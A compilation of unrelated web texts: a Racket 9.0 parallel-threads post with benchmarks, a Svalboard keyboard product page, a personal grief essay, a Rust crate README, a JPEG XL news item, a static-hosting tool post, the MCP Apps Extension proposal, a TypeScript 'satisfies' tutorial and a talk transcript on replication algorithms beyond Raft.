Chez Scheme is a much better foundation for improving parallelism in
Racket. Part of the Racket-rebuilding effort included improving Chez
Scheme’s support for parallelism: we added memory fences as needed for
platforms with a weak memory-consistency model, and we parallelized
the Chez Scheme garbage collector so that garbage collection itself
runs in parallel. There’s still plenty of room for improvement—
the
garbage collector is only parallel with itself, not the main program,
for example—
but further improvements are more within reach than
before. Equally important, the rebuild included new implementations of
the Racket thread scheduler and I/O layer in Racket itself (instead of
C). Because of these improvements, Racket’s futures worked better for
parallelism from the start in Racket CS than in Racket BC.
With version 9.0, we finally take advantage of new opportunities for
parallelism created by the move to Racket CS. Internally, a parallel
thread is backed by combination of a future and a coroutine thread.
The main extra work was making Racket’s coroutine thread scheduler
cooperate more with the future scheduler and making the I/O layer safe
for Chez Scheme threads—
all while making locks fine-grained enough
to enable parallelism, and keeping the cost of needed synchronization
as low as possible, including for non-parallel Racket programs.
Performance
Here are some simple benchmarks on an M2 Mac to give a sense
of the state of the current implementation. This machine has 8
cores, but 4 big and 4 little, so ×4 speedup is possible with
4-way parallelism but less than ×8 with 8-way parallelism.
As an easy first example, we should expect that a Fibonacci [
code
] run of
1 iteration in each of 4 coroutine threads takes the same time as
running it 4 iterations in 1 thread, while 1 iteration in each of 4
parallel threads should take about 1/4th of the time. Also, for such a
simple function, using plain old futures should work just as well as
parallel threads. That’s what we see in the numbers below.
Times are shown as a speedup over single-threaded, then in
real elapsed milliseconds, with CPU milliseconds as the upper smaller
number to the right, and CPU milliseconds that are specifically for GC
as the lower smaller number to the right. The times are from a single
run of the benchmark.
(
fib
40
)
real msec
N
sequential
coroutine
parallel
futures
1
×1
511
×1
506
×1
494
×1
495
4
×1
2045
×1
2034
×3.7
554
×3.8
545
8
×1
4154
×1
4154
×5.4
776
×5.2
796
Of course, most programs are not just simple arithmetic. If we
change our example to repeatedly convert numbers back and forth
to strings as we compute Fibonacci [
code
], then
we can see the effects of the more complex conversions. This version
also triggers frequent allocation, which lets us see
how thread-local allocation and parallel garbage collection scale.
(
strfib*
32
)
real msec
N
sequential
coroutine
parallel
futures
1
×1
204
×1
205
×1.1
192
×1
211
4
×1
826
×1
808
×3.7
222
×3.7
221
8
×1
1619
×1
1602
×3.9
419
×4
406
From this table, we still see reasonable scaling up to four cores,
but the additional work and the use of the garbage collector limit
scaling beyond that point.
That first string variant of Fibonacci includes a slight cheat,
however: it goes out of its way to use a
string->number*
wrapper that carefully calls
string->number
in a way that
avoids evaluating expressions that compute the default values of some
arguments. The defaults consult the
parameters
read-decimal-as-inexact
and
read-single-flonum
—
which a perfectly fine thing to do in
general, but turns out to block a future, because parameter values
can depend on the current continuation. In contrast, parallel threads
continue to provide a benefit when those kinds of Racket constructs
are used. We can see the difference by using plain
string->number
in place of
string->number*
, which
will fetch parameter values 14 million times in each individual run of
(
strfib
32
)
:
(
strfib
32
)
real msec
N
sequential
coroutine
parallel
futures
1
×1
772
×1.3
578
×1.1
721
×0.9
873
4
×1
3169
×1.3
2364
×4
797
×0.8
4164
8
×1
6409
×1.4
4730
×4.3
1493
×0.8
8353
The coroutine column here also shows an improvement, surprisingly.
That’s because a coroutine thread has a smaller continuation than the one in
the sequential column, and the cost of fetching a parameter
value can depend (to a limited degree) on continuation size.
The effect of parallel threads on this kind of program is
more consistent than fine details of a continuation’s shape.
Operations on mutable
equal?
-based
hash tables
[
code
] are another case where
futures block, but parallel threads can provide performance
improvement.
(
hash-nums
6
)
real msec
N
sequential
coroutine
parallel
futures
1
×1
193
×1
190
×1
186
×1
191
4
×1
767
×1
763
×3.7
208
×1
763
8
×1
1541
×1
1532
×4.5
346
×1
1539
As an illustration of the current limitations of parallel threads in
Racket, let’s try a program that writes data to a byte-string
port
then hashes it
[
code
].
(
hash-digs
7
)
real msec
N
sequential
coroutine
parallel
futures
1
×1
127
×1
127
×0.9
135
×1
126
4
×1
503
×0.9
536
×2.5
201
×1
520
8
×1
1022
×0.9
1097
×2.5
403
×1
1049
Here we see that parallel threads do get some speedup, but
they do not scale especially well. The fact that separate
ports are not contended enables performance
improvement from parallelism, but speedup is limited by some
general locks in the I/O layer.
Even further in that direction, let’s try a program that
hashes all files in the current directory [
code
] and
computes a combined hash. When run on the
"src"
directory of
the Racket Git repository, most of the time is reading bytes from
files, and locks related to file I/O are currently too coarse-grained
to permit much speed-up.
(
hash-dir
)
real msec
N
sequential
coroutine
parallel
futures
1
×1
170
×1
169
×0.7
256
×1
170
4
×1
692
×1
662
×1.3
515
×1
681
8
×1
1393
×1.1
1293
×1.6
868
×1
1368
Having locks in place for parallel threads can impose a cost on
sequential programs, since locks generally have to be taken whether or
not any parallel threads are active. Different data structures in
Racket use specialized locks to minimize the cost, and most benchmarks
reported here run report the same numbers in sequential column in Racket v8.18 (the
previous release) and Racket v9.0. The exceptions are the
(
hash-nums
6
)
and
(
hash-digs
7
)
benchmarks, because
those measure very-fine grained actions on mutable hash tables and I/O
ports, and the cost is largest for those. Comparing sequential times
for those two versions shows that support for parallel thread can cost
up to 6-8% for programs that do not use them, although the cost tends
to be much less for most programs.
(
hash-nums
6
)
real msec
N
v8.18 sequential
v9.0 sequential
1
×1
188
×0.96
195
4
×1
757
×0.98
773
8
×1
1520
×0.98
1546
(
hash-digs
7
)
real msec
N
v8.18 sequential
v9.0 sequential
1
×1
118
×0.94
126
4
×1
474
×0.94
506
8
×1
947
×0.92
1025
Overall, parallelizable numerical programs or ones that manipulate
unshared data structures can achieve speedup through parallel threads
relatively easily, but I/O remains a direction for improvement.
Backward Compatibility
If a library uses mutable variables or objects, either publicly or
internally, then it must use locks or some other form of concurrency
control to work properly in a multithreaded context. Racket already
has concurrency, and the expectation for libraries to work with
threads does not change with the introduction of parallel threads.
Racket’s semaphores, channels, and other synchronization constructs
work the same with parallel threads as concurrent threads. Even
programs that use lock-free approaches based on compare-and-swap
operation (such as
box-cas!
) continue to work, since Racket’s
compare-and-swap operations use processor-level primitives.
Still, there are a few concerns:
Racket’s coroutine threads offer the guarantee of
sequential consistency
, which means that effects in one
thread cannot be seen out-of-order in another thread. Parallel threads
in Racket
expose
the underlying machine’s memory-consistency model
, which may allow
reordering of memory effects as observed by other threads. In general,
a weak memory model can be an issue for code not intended for use with
threads, but Racket—
more precisely, Chez Scheme—
always guarantees
the memory safety of such code using memory fences. That is, Racket
code might observe out-of-order writes, but it never observes
ill-formed Racket objects. The fences are not new, and they are part of
the same write barrier that already supports generational garbage
collection and the memory safety of futures. Although
sequential consistency supports lock implementations that don’t work
with weaker memory models, so they would work with coroutine threads
and not parallel threads, we have not found any such
implementations in Racket libraries.
Some Racket libraries use
atomic mode
for concurrency
control. Atomic mode in Racket prevent coroutine thread swaps, and
entering atomic mode is a relatively cheap operation within Racket’s
coroutine scheduler. When a parallel thread enters atomic mode, then
it prevents other coroutine threads from running, but it does
not
prevent other parallel threads from running. As long as
atomic mode is used consistently to guard a shared resource, then it
continues to serve that role with parallel threads.
Entering atomic mode is a much more expensive operation in a parallel
thread than in a coroutine thread; in many cases, Racket core
libraries that need finer-grained locking more specifically need to
move away from using atomic mode. Still, making atomic mode
synchronize a parallel thread with coroutine thread provides a
graceful fallback and evolution path.
Foreign functions that are called by Racket in a coroutine
threads are effectively atomic operations when there are no parallel
threads, since a coroutine swap cannot take place during the foreign
call. It’s rare that this atomicity implies any kind of lock at the
Racket level, however, and the foreign function itself is either
adapted to operating-system threads or not. Racket can already create
operating systems threads through
dynamic-place
, and
foreign-function bindings have generally been adapted already to that
possibility.
The greater degree of concurrency enabled by parallelism exposed some
bugs in our existing core libraries that could have been triggered
with coroutine threads, but hadn’t been triggered reliably enough to
detect and repair the bugs before. Beyond those general improvements,
our experience with pre-release Racket is that parallel threads have
not created backward-compatibility problems.
Banish pain with the most adaptable ergonomic keyboard and mousing instrument ever made.
Magnetic = Light + Tactile
Lightly
brings fifty perfectly light, perfectly tactile magneto-optical keys to your fingertips, with integrated pointing for completely hands-down operation.
"Over the past six months, the Svalboard has transformed the way I work, helping alleviate my neck and shoulder issues by allowing me to type without strain. Svalboard isn’t just another keyboard—it’s a game-changer for comfort and productivity."
Built with a ~15° tent angle and M5 tenting screw inserts for extra tenting. It also has 1/4"-20 inserts for additional mounting options: chair-mount, lap desk, keyboard tray and Magic Arm compatible. Pictured here with
SmallRig Rosette 11" Magic Arms
Multiple Pointing Options
Trackball, Trackpoint, and now: Touchpad!
Mix-and-match these integrated pointing devices for maximum comfort.
QWERTY
touch typers start with their fingers on the home-row:
A,S,D,F
for the left hand and
J,K,L,;
for the right hand. On Svalboard these are exactly the same. Your fingers rest on the round center keys of each key cluster. Then the
G
and
H
are simply inward flicks of the index fingers. The remaining four letters:
T, Y, B
and
N
are assigned new positions, becoming inward flicks of the middle and ring fingers. The thumb keys switch between different layers: (1)
Letters
, (2)
Numbers
, (3)
Functions
and (4)
Navigation
.
Alternative layouts like
Dvorak
or
Colemak
are easy to set up because the Svalboard Lightly is infinitely customizable. It uses
Vial-QMK
to change keys in real-time with no flashing required.
No more springs or lubed switches. Svalboard's keys are light 20gf magneto-optical keys that have a 100% front-loaded force profile and a clean breakaway unlike anything else on the market. Fingers move just a few mm for any keypress. This reduces hand workload and fatigue by ~90% vs traditional keyboards, even "ergonomic" ones.
No more contortions or reaches to hit the keys at the edge of your keyboard.
"As a Datahand user of 20+ years, I can safely say that Datahand saved my career. I've tried everything over the years, and there's simply no comparison. When the company died, I was gutted. When one of my precious Datahand units got damaged during travel, I got serious about building a replacement.
It was around then I found out about Ben Gruver's amazing
lalboard
design and built one myself, with lots of help from him.
Lalboard laid the foundation of basic key mechanisms which enabled Svalboard to come to life, but... it was not a production-oriented design. With my background in high volume consumer electronics and input tech development, I decided it was time for me to dive in and make it a reality.
Like Datahand. I hope Svalboard will help thousands of RSI sufferers like me enjoy a faster, safer, more precise, and most of all PAIN FREE typing experience."
Built for the long now
In the spirit of the Svalbard Global Seed Vault, we're committed to a living design which can always be repaired, updated and modified by customers.
All mechanical parts can be produced on a hobby-grade 3D printer, from SLA, or CNC'd from any material you like.
All pinouts are available if you want to hack your own electrical modifications, too.
In the proud tradition of the Datahand, we've designed Svalboard to be robust, easy-to-clean, and repairable.
Unlike Datahand, Svalboard is totally modular, for easy repairs and modifications.
There are no electromechanical contacts to wear out.
Keys are easily removable for cleaning.
Did we mention you can make your own replacement/custom-fit parts on a hobby-grade 3D printer?
Proudly made in the USA
,
with a global following
People in over two dozen countries are enjoying pain-free typing with Svalboard Lightly today. Join them on the Discord and learn how Lightly changed their lives:
a few days after
dad died
, we found the love letters, hidden away among his things. one of them said,
i love dota and i love peaches, but i love you more. i will quit smoking and lose weight for you. the happiest days of my life are the ones that start with you across the breakfast table from me.
my parents were not a love match. at 27 and 26, they were embarrassingly old by the standards of their small chinese port town. all four of my grandparents exerted enormous pressure to force them together.
my father fulfilled the familial obligations heaped on his shoulders without complaint. he didn't get along with my mother, or my younger brother, but this wasn't too bad; he often worked away from us (for months and even years on end), mostly in china, more recently in redacted, another canadian city.
the physical distance between us for most of my life has made his passing easier for me to come to terms with. i call him dad here but i didn't lose a dad, i lost someone who was abstractly a father to me. he was more often gone than there, had missed all of my graduations and birthday parties. there was one time he took care of me when i was sick. his hands on me were gentle, and he told me stories from chinese history while i lay feverish in bed. i was seven. this is approximately the only memory i have of him being a dad to me.
still, the two of us were close in our own way. sometimes, the two of us would go on long walks together. after fifteen minutes of silence, or twenty, something would loosen in him and he would start to tell me about the depths of his sadness and the disappointment in the way his life played out. i was good at not taking this personally. i didn't think he ever had a chance to be happy or authentic, his entire life. he sacrificed himself so i could.
i always thought that if he had a chance at happiness, he would be the gentle, funny, and sensitive aesthete that i caught glimpses of sometimes, instead of the bullheaded chinese patriarch others seemed to demand.
except it turns out he did have this chance after all. his lover and i ended up meeting soon after his death. edward lived in redacted, the city that my dad had worked in for the past year and a bit.
edward tells me their story, all in a rush. he and my dad had been seeing each other for three years, and had agreed to go exclusive a year and a half ago. they met while he was in china, and there was an instant spark between them, something special and precious that neither of them had felt before. dad convinced him to apply for a university program here in canada, to eventually get permanent residency in canada. so edward, in his 30s, sold his flourishing business and his house, and came to start over in a foreign land for the sake of being with him.
edward reckons they were engaged, or something like it; they lived together, toured open houses in redacted every weekend with every intent to buy something together, and there was an understanding that dad would soon come out, divorce my mother, and live in the open with edward for the rest of their lives.
edward gave me some photos he had of my dad, and i could scarcely believe that they were of the grim, sad man i knew. he beams in all of them, glowing with joy, his smile more incandescent than i've ever seen in my entire life. i steal glances at edward, the person who took all those impossible photos. the person he was looking at.
my mind keeps stuttering to boskovitch's installation, that single box fan behind plexiglass. i imagine the course of events from edward's point of view: a year living with the love of your life, and then they are suddenly gone in an awful accident and you are too late to see them one last time, to attend the funeral. your own grief is an isolating thing because you are closeted and no one else knew who you were to each other. i wish we had gotten in touch sooner, but edward is grateful to be allowed any affordance, at all.
their life in redacted seemed similarly impossible: a life where my dad splurged on the treats he never did at home (hagen dazs ice cream, honeycrisp apples, nice shoes) and left the house on a regular basis to explore the city with the one he loves. a life where he felt safe enough to ask for kisses and cuddles because he knew they would be provided, even to
sa jiao
playfully. all i ever knew him to do at home was to sit in a stupor by the television set.
and there was a new hurt, but it was sweet, to imagine the way life could have been in ten years time, a life i've never previously imagined; dad happily with edward in a nice new house where i'd visit every so often, shoulders loose and smiling, and we'd get to talk,
actually
talk.
according to edward, my dad had known that he had liked men at least since his university years. that makes it almost forty years in the closet, then; just thinking about it makes me feel a sort of dizzying claustrophobia.
i came out to mom years before i came out to dad. when i did, mom told me that coming out to dad was not a good idea, because he was such a traditionalist and she didn't know how he would react. but i came out to him anyways, one quiet afternoon when i visited him in china, because i thought our relationship was good and that he can handle it, and i wanted him to know this about me.
when i did, he took it well. he told me that though the path i am on is a painful one, he would be there for me, and that the most important thing was to find
xin fu
in life, not to live your life in accordance to the expectations of anyone else. in my staggering relief i did not notice the confusion. i just felt so grateful to have had that understanding, a precious gift that i did not have any expectation of receiving. now, i feel only bereft of the conversations we never managed to have, and grief for the life he never got to live.
dad lives in my living room these days, in a box made of cherry wood, because mom didn't want him in the house after the truth came out. so when edward visited, he got to see him one last time, and say goodbye. he held the box in his arms and wept, spilling more tears and emotions than his biological family managed to, and i escaped to my room for the evening to give them some privacy.
did i mention the shrines? we set them up for the dead in our culture. we had ours, a formal thing in a cabinet, and we had knelt in front of it like we were supposed to, given the correct number of kowtows. edward shared with me pictures of his. it sprawled over the entirety of his dining table. it had packs of playing cards from the brand he liked best and his favourite cuts of meat and the wine he finished off the day with. every morning, he would play my dad's favourite songs to him. i didn't know my dad's favourite cuts of meat. i didn't know he drank wine. i didn't know he listened to music.
so of course i let them say goodbye to each other. when i went out of my room the next morning, he was still fully dressed on my couch, bedding untouched, staring blankly at the box in his lap. it gleamed red in the morning sun. he rose at my approach, put my dad back on the mantle with gentle hands, and then stood quietly at a perfect parade rest in front of him as i managed breakfast for the two of us. his flight back to redacted was that afternoon.
i don't know how to thank you for all this, he says. the chance to say goodbye. he was really proud of you, he spoke about you to me all the time. he never told me that you were gay. edward tells me that dad had plans to go back to redacted in a few weeks time and that he wanted to tell me everything before he left, but he was anxious about how i'd take it. i don't ask edward how many times he'd made the resolution to tell me before.
because you see, my dad was a coward. mom had started asking for divorces by the time i was in my teens, and dad was the one who always said no. he would complain to
her
mother, a traditionalist, to ensure that she would berate her daughter back into line. his family and his culture had no place for him, so he used her as a shield to make sure that he would be spared the scrutiny. slowly, we found evidence of other affairs, going back decades. of course my mother did not want him in the house.
i sit by my dad sometimes, and i make sure he always has a bowl of fresh fruit. fifty seven years, most of them suffocating and miserable, the last three of them shot through with so much joy his smile absolutely glows.
he wasted his entire life
, my mom said to me, the evening we found the love letters.
his entire life, and mine as well.
This crate implements as small parser for token streams holding S-Expressions.
The S-Expression syntax is very minimal and not conforming to any standard.
The only dependency is
proc-macro2
,
so it should compile very fast.
Why ?
The goal of this library is to make it as convenient as possible to write
a whole range of proc macros. Writing a proc macros usually takes a
lot of effort.
Most of that effort goes into parsing the input, typically using
syn
, which is incredibly powerful, but
very tedious, and slow to compile. If you don't need to bother yourself with
parsing, and have an easy time accessing the results of said parsing, most
of the trouble of writing proc-macros is gone already.
Additionally, QSP is very simple and only has a single dependency, which
should make it compile pretty fast.
Sadly, you will still have to create a macro-crate for your proc-macro.
To reach true lisp-macro-convenience, we still require
in-package proc-macros
Examples
You can run this by running
cargo run --example pipe
. It implements
a simple pipe macro. If you were to put this into a macro-crate and name
it
pipe
, an invocation in actual code would look just like the
input_string
except
with
pipe!
before the opening parenthesis. And you would need to turn the result
string into a
TokenStream
again, of course.
The following functions are defined on the
Expr
type, which make it
very easy to use. The error messages contain as much information as possible,
and should make it easy to catch mistakes, even if you just liberally use
?
everywhere.
try_flat_map<F, T, E, R>(&self, f: F) -> Result<Vec<T>, TryFlatMapError<E>
BorrowedList
reimplements all list-related functions.
State
This is still a proof of concept. I intend to use it the next time I need
a proc-macro, but that hasn't happened yet. It currently serves as an example
of an idea.
Google Revisits JPEG XL in Chromium After Earlier Removal
Three years ago, Google removed JPEG XL support from Chrome, stating there wasn’t enough interest at the time. That position has now changed.
In a recent note to developers, a Chrome team representative
confirmed
that work has restarted to bring JPEG XL to Chromium and said Google “would ship it in Chrome” once long-term maintenance and the usual launch requirements are met.
The team explained that other platforms moved ahead. Safari supports JPEG XL, and Windows 11 users can add native support through an image extension from Microsoft Store. The format is also confirmed for use in PDF documents. There has been continuous demand from developers and users who ask for its return.
Before Google ships the feature in Chrome, the company wants the integration to be secure and supported over time.
Chrome JPEG XL implementation adds animation support
A developer has submitted new code that reintroduces JPEG XL to Chromium. This version is marked as feature complete. The developer
said
it also “includes animation support,” which earlier implementations did not offer. The code passes most of Chrome’s automated testing, but it remains under review and is not available to users.
The featured image is taken from an unlisted developer demo created for testing purposes.
JPEG XL is a newer image format intended as a replacement for traditional JPEG files. It can reduce file size without loss in visual quality. This may help web pages load faster and reduce data usage. More details are available on the
official JPEG XL website
.
Google has not provided a timeline for JPEG XL support in Chrome. Users cannot enable the format today, but development has restarted after years without progress.
Venkat is a tech writer with over 15 years of experience, known for spotting new browser features and tech changes before they go public. Based in India, he breaks down under-the-radar browser updates to help readers stay ahead.
Readers help support Windows Report. We may get a commission if you buy through our links.
Read our disclosure page to find out how can you help Windows Report sustain the editorial team.
Read more
trifold is a tool to quickly & cheaply host static websites using a CDN
Lobsters
jpt.sh
2025-11-23 05:28:58
I built this to replace my Netlify* workflow for dozens of small static sites & thought others might find it useful. A single config file and you can trifold publish to your heart's content. Unlike free options** it requires a bunny.net CDN account, but you can host as many of your static sites ...
This allows painless deployment of sites consisting entirely of static assets (HTML, CSS, JS, images) for pennies a month.
It is the perfect companion to deploy sites built with static-site generators like
Hugo
,
Zola
,
Quarto
, or
zensical
.
The tool provides a simple CLI that allows:
initializing new projects without touching the CDN web interface
syncing local HTML/CSS/JS/etc. to the CDN & clearing the cache
configuring a custom domain name to point at your files, with SSL enabled
setting a maximum monthly cost to avoid surprise bills
using CDN edge functions to support redirects
This project grew out of frustration with services making their free tier less friendly to indie devs and students that just need a cheap & reliable place they can host things.
trifold
offers an easy alternative to services like Cloudflare Pages, Netlify, and GitHub pages.
Instead of relying on a free service it is hopefully going to be more stable to rely on a paid service with a reasonable price point and the ability to set billing limits.
At the moment
bunny.net
1
is the only supported provider, but others can be added.
bunny.net is a professional-grade CDN that is also very affordable.
Like most hosts, they charge for both storage & bandwidth.
Both starts at $0.01/GB/mo.
The typical static webpage is under 1GB, meaning storage costs will be negligible unless you decide to host audio/video. And if you do, the rates are
far
cheaper than most competitors, see their
pricing
for details.
In terms of bandwidth, let's say your page size is 2MB (a moderate-sized page) and hits the front page of a popular website, driving a surge of 25,000 hits. (
Congrats!
)
Not only will your site handle the traffic just fine, your total bill will be
$0.50 for the 50GB of bandwidth used.
(You could serve a million hits, ~2TB, for $20.)
Of course, most sites will only get a fraction of this traffic.
It is possible to host dozens of low-traffic sites for the $1/monthly minimum bill.
Cryptographers Held an Election. They Can't Decrypt the Results
Today we’re introducing the proposal for the
MCP Apps Extension
(
SEP-1865
) to standardize support for interactive user interfaces in the Model Context Protocol.
This extension addresses one of the most requested features from the MCP community and builds on proven work from
MCP-UI
and
OpenAI Apps SDK
- the
ability for MCP servers to deliver interactive user interfaces to hosts
.
MCP Apps Extension introduces a standardized pattern for declaring UI resources, linking them to tools, and enabling bidirectional communication between embedded interfaces and the host application.
The SEP was authored by MCP Core Maintainers at OpenAI and Anthropic, together with the MCP-UI creators and lead maintainers of the MCP UI Community Working Group.
Standardization for interactive interfaces
Currently, MCP servers are limited to exchanging text and structured data with hosts. While this works well for many use cases, it creates friction when tools need to present visual information or gather complex user input.
For example, consider a data visualization MCP server that returns chart data as JSON. The host application must interpret that data and render it. Handling all kinds of specialized data in this scenario translates to a significant burden for client developers, who would need to build their own logic to render the UI. As more UI requirements come up, like the need to collect multiple related settings from users, the complexity balloons. Alternatively, without UI support, these interactions become awkward exchanges of text prompts and responses.
The MCP community has been creative in working around these limitations, but different implementations using varying conventions and architectures make it harder for servers to work consistently across clients. This lack of standardization creates a real risk of ecosystem fragmentation - something we’re working to proactively prevent.
Building together
The
MCP-UI project
, created by
Ido Salomon
and
Liad Yosef
and maintained by a dedicated community, spearheaded the vision of agentic apps with interactive interfaces. The project developed patterns for delivering rich user interfaces as first-class MCP resources, proving that agentic apps fit naturally within the MCP architecture. The project is backed by a large community and provides
rich SDKs
, adopted at leading companies and projects such as Postman, Shopify, Hugging Face, Goose, and ElevenLabs.
The
OpenAI Apps SDK
further validated the demand for rich UI experiences within conversational AI interfaces. The SDK enables developers to build rich, interactive applications inside ChatGPT using MCP as its backbone. To ensure interoperability and establish consistent security and usage patterns across the ecosystem, Anthropic, OpenAI, and MCP-UI are collaborating to create an official MCP extension for interactive interfaces.
MCP Apps Extension specification
We’re proposing a specification for UI resources in MCP, but the implications go further than just a set of schema changes. The MCP Apps Extension is starting to look like an agentic app runtime: a foundation for novel interactions between AI models, users, and applications. The proposal is intentionally lean, starting with core patterns that we plan on expanding over time.
Key design decisions
Pre-declared resources
UI templates are resources with the
ui://
URI scheme, referenced in tool metadata.
// Server registers UI resource
{
uri:"ui://charts/bar-chart",
name:"Bar Chart Viewer",
mimeType:"text/html+mcp"}
// Tool references it in metadata
{
name:"visualize_data_as_bar_chart",
description:"Plots some data as a bar chart",
inputSchema: {
type:"object",
properties: {
series: { type:"array", items: .... }
}
},
_meta: {
"ui/resourceUri":"ui://charts/bar-chart",
}
}
This approach enables hosts to prefetch and review templates before tool execution, improving both performance and security. It also separates static presentation (the template) from dynamic data (tool results), enabling better caching.
MCP transport for communication
Instead of inventing a custom message protocol, UI components communicate with hosts using existing MCP JSON-RPC base protocol over
postMessage
. This means that:
UI developers can use the standard
@modelcontextprotocol/sdk
to build their applications
All communication is structured and auditable
Future MCP features automatically work with the UI extension
Starting with HTML
The initial extension specification supports only
text/html
content, rendered in sandboxed
iframes
. This provides:
Universal browser support
Well-understood security model
Screenshot and preview generation capabilities
A clear baseline for future extensions
Other content types such as external URLs, remote DOM, and native widgets are explicitly deferred to future iterations.
Security-first
Hosting interactive content from MCP servers requires careful security consideration. The proposal addresses this through multiple layers:
Iframe sandboxing
: All UI content runs in sandboxed iframes with restricted permissions
Predeclared templates
: Hosts can review HTML content before rendering
Auditable messages
: All UI-to-host communication goes through loggable JSON-RPC
User consent
: Hosts can require explicit approval for UI-initiated tool calls
These mitigations create defense in depth against malicious servers while preserving the flexibility developers need.
Backward compatibility
MCP Apps is an optional extension. Existing implementations continue working without changes, and hosts can gradually adopt UI support at their own pace. Servers should provide text-only fallback for all UI-enabled tools and return meaningful content even when UI is unavailable, so they can serve both UI-capable and text-only hosts.
What’s next
The
UI Community Working Group
has been instrumental in shaping this proposal through extensive feedback and discussion. We have built an
early access SDK
to demonstrate the patterns and types described in the specification proposal. The
MCP-UI
client and server SDKs support these patterns.
If you are interested in contributing to this effort, we invite you to:
Test prototype implementations and share your experience
Acknowledgements
This proposal wouldn’t exist without the work of the maintainers at MCP-UI, OpenAI, and Anthropic.
Ido Salomon
and
Liad Yosef
, through MCP-UI and moderation of
#ui-wg
, incubated and championed many of the patterns that MCP Apps now standardizes, and together with contributors demonstrated that UI resources can be a natural part of MCP.
Sean Strong
,
Olivier Chafik
,
Anton Pidkuiko
, and
Jerome Swannack
from Anthropic helped steer the initiative and drive the collaboration.
Nick Cooper
,
Alexei Christakis
, and
Bryan Ashley
from OpenAI have provided valuable direction from their experience building the Apps SDK.
Special thanks to the
UI Community Working Group
members and everyone who contributed to the discussions that shaped this proposal.
I’ve been doing a lot of work in TypeScript lately, and with that I’ve spent quite a bit of time learning more about its type system. TypeScript is a wonderfully advanced language though it has an unfortunately steep learning curve; in many ways it’s the complete opposite of Go.
One confusing thing about TypeScript is that it doesn’t always infer the most precise type possible. As an example:
// name is of type "Jerred"constname = "Jerred";// person1 is of type { name: string }constperson1 = {name: "Jerred",};// person2 is of type { readonly name: "Jerred" }constperson2 = {name: "Jerred",} asconst;
Why is the name of
person1
of type
string
and not the literal
"Jerred"
? Because the object
could
be mutated to contain any other string.
What happens when I want to pass those objects to a function that requires
name
to be
"Jerred"
?
functionhandleJerred(name: "Jerred") { // do something}// these are okayhandleJerred(name);handleJerred(person2.name);handleJerred(person1.name);
Argument of type 'string' is not assignable to parameter of type '"Jerred"'.
As we’d expect, the types don’t match up. The most obvious way is to annotate the variable declaration with the expected type:
We could also use the
satisfies
keyword. This keyword is a bit esoteric and not very common, but it comes in handy in some scenarios where you’d otherwise pull your hair out.
satisfies
is an alternative to an explicit variable type annotation. It tells TypeScript that your assignment should be
at least
assignable to the provided type. It’s kind of like a type-safe way to cast values.
The benefit of
satifies
over an variable type annotation is that it lets TypeScript infer a more specific type based on the value provided. Consider this scenario:
typePerson = {name: string;isCool: boolean;};functioncoolPeopleOnly(person:Person & { isCool: true }) { // only cool people can enter here}constperson1:Person = {name: "Jerred",isCool: true,};// okay, so we need to say that `isCool` is truecoolPeopleOnly(person1);
Argument of type 'Person' is not assignable to parameter of type 'Person & { isCool: true; }'.
Type 'Person' is not assignable to type '{ isCool: true; }'.
Types of property 'isCool' are incompatible.
Type 'boolean' is not assignable to type 'true'.
// and we also need to include the name field...constperson2: { isCool: true } = {name: "Jerred",
Object literal may only specify known properties, and 'name' does not exist in type '{ isCool: true; }'.
TypeScript will ensure that your value is assignable to your type. The type of the assigned variable will be made based on the type of the value instead of the type provided to
satisfies
.
This really comes in handy when you want to ensure that TypeScript is being as specific as possible.
This talk is an extension of my earlier
Data Replication Design Spectrum
blog post. The blog post was the analysis of the various replication algorithms, which concludes with showing that Raft has no particular advantage along any easy analyze/theoretical dimension. This builds on that argument to try and persuade you out of using Raft and to supply suggestions on how to work around the downsides of quorum-based or reconfiguration-based replication which makes people shy away from them.
Video
Transcript
Hi folks. I’m here to try and convince you to consider options other than Raft.
Raft, or just leadered consensus in general and I’m using the two interchangeably in this talk, has emphatically won both on actual usage in databases by my somewhat haphazard survey…
And even more subjectively it’s won by mindshare. Any discussion I see of replication is always about raft. (and this is edited, throughout this whole talk, I’m not trying to subtweet any one person/project/whatever) But it’s always Raft. Or multi-paxos. Or that viewstamped replication should be the one true replication algorithm. And this grates on me, because if you’re choosing between three options, those aren’t even the right three to be considering.
I claim there’s three classes of replication algorithms
[1]
: Quorums, Reconfiguration, and leadered consensus as a hybrid of the two, and that all replication algorithms can be placed along a single axis which classifies them based upon how they handle failures. With quorums, the loss of any member of the replication group can be tolerated, and replication continues on. Think Cassandra. With reconfiguration, the write-all-read-one replication halts on a failure, and continues once the failed node has been automatically replaced. Historically, this is like MySQL with failover. And finally our overused Raft exists as a hybrid of the two: the followers act like quorum replication, but having a leader bumps it one tick towards reconfiguration.
[1]: This is the one slide summary of what
Data Replication Design Spectrum
tries to pitch in terms of classification.
And so this talk is framed as trying to argue my hypothetical arch-nemesis out their mental model here that Raft is the absolute best and always the correct default option, and anything else should only be used begrudgingly in some
very
specific cases. I’m actually trying to get to the argument of: please just use the best suited replication algorithm, but that’s going to involve some Raft bashing while sprinkling in advice on how to succeed in a non-raft world.
So let’s get started.
We’re going to first tackle the broad argument that raft is just uniformly superior. And if you tell me it’s best, I want to know, it’s best at… what?
If it’s the best at something, I should be able to sit down, and do the math of how it acts along some dimensions versus the alternatives, and show, inarguably, that raft delivers better
something
than the alternatives. But I’ve done that math. I have a blog post which calculates Quorums, Raft, and Reconfiguration along these dimensions, with every notable variant or proposed raft optimization factored in.
And that post shows: Raft isn’t better. In every category, it’s at best tied, and at worst, it’s the worst. Most distributed database deployments I’ve worked with have been storage bound, and that 40% higher storage efficiency for reconfiguration can mean a lot of money. Or if you care about availability, on paper, leaderless Paxos gives you better tail latencies with less availability blips than Raft. So the math isn’t justifying Raft’s absurd popularity.
There’s also this draw to Raft that it’s great because of its simplicity. It’s simpler than Multi-Paxos, for sure, it did a great job at that.
But in the in the broader picture, Raft isn’t simpler. Quorums have different replicas with different states and different orders of operations causing an explosion of states to check for correctness. But once you’ve handled that, all distributed systems problems of slowness, failures, partitions, what-have-you all look the same.
Reconfiguration is the opposite. I’ve worked on FoundationDB, a very reconfiguration-based databases, and whenever some code sends an RPC, either it gets a reply or everyone gets killed and the system resets. All the code is happy-path only, as all failures get pushed through one reconfiguration process. It’s beautifully simple. But gray failures are hard, and having to precisely answer “is this other replica sufficiently alive?” is the challenge that Reconfiguration gains instead.
And Raft is both of these things, so not only do you have to have a well-integrated failure detector for the leader, but you also have a tremendous state space to search in which bugs could be hiding from the quorum of followers. It’s not simpler.
One could argue "Raft is better than Reconfiguration because Reconfiguration has unavailability!"
